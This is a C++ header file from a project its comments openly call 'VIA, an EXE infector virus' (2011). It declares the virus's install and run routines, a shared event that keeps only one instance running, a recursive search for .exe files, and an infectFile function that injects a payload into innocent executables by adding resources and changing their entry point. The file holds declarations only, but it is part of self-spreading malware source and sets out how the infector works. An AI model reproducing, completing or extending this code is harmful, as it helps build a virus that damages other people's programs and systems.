/**
 * @author	Yitzchak Arad
 * @project	VIA, an EXE infector virus
 * @date	2011
 */

#pragma once

#include "dbg.h"
#include <Windows.h>
#include <string>
#include <set>

/**
 * @brief	Installs VIA, as DLL or EXE and tries to start it.
 * @param	moduleFileName - an unicode string, representing the full path to VIA image
 * @returns	true if the installation succeeded
 * @note	the function may return true, even if the 'Start' operation failed.
 */
bool ViaInstall(const std::wstring& moduleFileName);

/**
 * @brief	Starts VIA Main loop.
 * @param	targetDir - an unicode string, representing the directory to infect
 * @returns	true, if the function started.
 *			false, if another instance is running
 * @note	the function prevents itself from running more than one time on the system.
 */
bool ViaRun(const std::wstring& targetDir);

/**
 * @brief	Sets any other instance of VIA to go down.
 * @returns	true, if there is no another instance running.
 *			false, if other instance is still running.
 * @note	the function sets the events, and polls it 10 times, with delay of 1 second.
 *			so in the worst case, it will take 10 seconds to return.
 */
bool ViaDown();

/**
 * @brief	opens the event for mutual running, and stores its handle in the global var.
 * @returns	true, if we are the only instance of VIA running.
 *			false, if the event existed before (so another instance is running)
 * @note	the event is created with ALL_ACCESS for EVERYONE, so everyone can signal it.
 */
bool OpenMutualRunningEvent();

/**
 * @brief	checks whether the shutdown event is signaled. blocks for [waitMs] if not signaled.
 * @param	waitMs - amount of milli-seconds to wait for the event to become signaled.
 * @returns	true, if the event was signaled.
 * @note	this function assumes that the global event handle is already opened (using OpenMutualRunningEvent)
 */
bool IsShutdownEventSignaled(unsigned long waitMs);

/**
 * @brief	signals the shutdown event
 * @note	the event is opened with the caller security attributes
 */
void SignalShutdownEvent();

/**
 * @brief	closes the global event handle, if opened
 */
void CloseMutualRunningEvent();

/**
 * @brief	recoursive function, searches for all ".exe" files under [targetDir],
 *			for infection with [selfName] payload.
 * @param	targetDir - an unicode string, representing the path of the root dir to search in.
 * @param	selfName - an unicode string, representing the path to the payload to inject.
 * @note	the search order ia BFS (infect files in the current folder, and only after it go into sub directories)
 */
void searchExeFilesForInfection(const std::wstring& targetDir, const std::wstring& selfName, int iteration, std::set<std::wstring>& failedlist);

/**
 * @brief	injects a [payload] EXE file, into an innocent EXE file, located in [filename].
 * @returns	true, if the infection process succeeded, and false otherwise.
 * @note	two resources will be added into the file, and the entry point will be changed.
 * @see		addPICResourceToFile, adjustResourceAsEntryPoint for more information.
 */
bool infectFile(const std::wstring& filename, const std::wstring& payload);